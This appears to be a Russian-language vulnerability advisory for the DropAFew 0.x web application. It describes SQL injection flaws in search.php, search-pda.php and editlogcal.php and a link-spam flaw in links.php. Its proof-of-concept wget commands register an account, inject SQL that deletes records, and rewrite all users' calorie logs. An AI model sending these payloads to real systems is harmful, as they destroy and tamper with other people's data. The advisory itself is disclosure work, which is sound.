Программа: DropAFew 0.x

Найденные уязвимости позволяют удаленному злоумышленнику выполнить произвольные SQL команды в базе данных приложения, получить конфиденциальную информацию и осуществить манипуляцию данных на целевой системе.

1) Уязвимость возникает из-за ошибки в проверке входных данных в параметре "id" сценарием search.php и search-pda.php (когда "action" установлено в значение "del"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

# создание нового пользователя
wget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php

# удаление таблицы foodfacts
wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php

# make everyone have eaten 1000 strawberries, but hey, they were only 10
# calories ...
wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' http://[target]/calorie/editlogcal.php

2) Уязвимость возникает из-за ошибки в проверке входных данных в параметре "id" сценарием editlogcal.php во время авторизации. Атакующий может получить содержимое log файлов других пользователей.

3) Уязвимость возникает из-за ошибки в links.php. Атакующий может через links.php добавить ссылки на публичные страницы других пользователей, которые не могут быть удалены пользователем, что позволит «заспамить» Web сайт нежелательной информацией.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии